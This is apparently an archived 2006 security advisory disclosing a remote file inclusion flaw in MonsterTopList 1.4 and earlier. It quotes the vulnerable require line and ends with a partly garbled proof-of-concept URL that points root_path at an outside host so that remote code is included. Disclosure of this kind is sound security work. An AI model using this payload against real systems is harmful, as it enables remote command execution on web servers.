Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

manila.userland cross site scriptable

[KAPDA]MyBB1.1. 0~global. php~ParameterExtracti ng

[KAPDA]CopperminePhot oGallery1.4.4~ PluginInclusionSystem (index.php)~ RemoteFileInclusion attack

[eVuln] aWebBB Multiple XSS and SQL Injection Vulnerabilities

From:	r0t <krustevs_(at)_googlemail.com>
Date:	16.04.2006
Subject:	MonsterTopList- Remote Code Execution bug

MonsterTopList- Remote Code Execution bug

discovered By: VietMafia
=================================
Developer site: http://www.monstertoplist.com/
Software: MTL 1.4 and prior
Risk: Moderate
Status: unpatched
orginal advisory:http://pridels.blogspot.com/2006/04/monstertoplist.html

=================================

This flaw is due to an input validation error in the
"sources/functions.php"(line 8)
script that does not validate the "$root_path" variable,remote
attackers can include
malicious scripts and execute arbitrary commands with the privileges
of the web server

code:file sources/functions.php

line 8: require $root_path . "sources/func_output.php";



demo:

http://www.monstertoplist.com/demo.html



POC Exploit http://[target]/[path]/sources/functions.php?root_path=class="fixed">http://unsecured-systems.com/forum/